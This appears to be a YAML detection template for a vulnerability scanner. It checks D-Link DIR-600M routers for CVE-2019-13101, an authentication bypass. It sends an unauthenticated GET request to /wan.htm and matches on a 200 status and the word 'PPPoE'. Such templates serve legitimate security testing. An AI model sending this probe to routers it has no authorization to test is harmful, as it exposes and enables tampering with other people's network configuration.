32 lines
1.0 KiB
YAML
32 lines
1.0 KiB
YAML
id: CVE-2019-13101
|
|
|
|
info:
|
|
author: Suman_Kar
|
|
name: D-Link DIR-600M - Authentication Bypass
|
|
description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page.
|
|
severity: critical
|
|
tags: cve,cve2019,dlink,router,iot
|
|
reference: |
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
|
|
- https://github.com/d0x0/D-Link-DIR-600M
|
|
- https://www.exploit-db.com/exploits/47250
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /wan.htm HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{BaseURL}}
|
|
Connection: close
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "/PPPoE/"
|
|
part: body |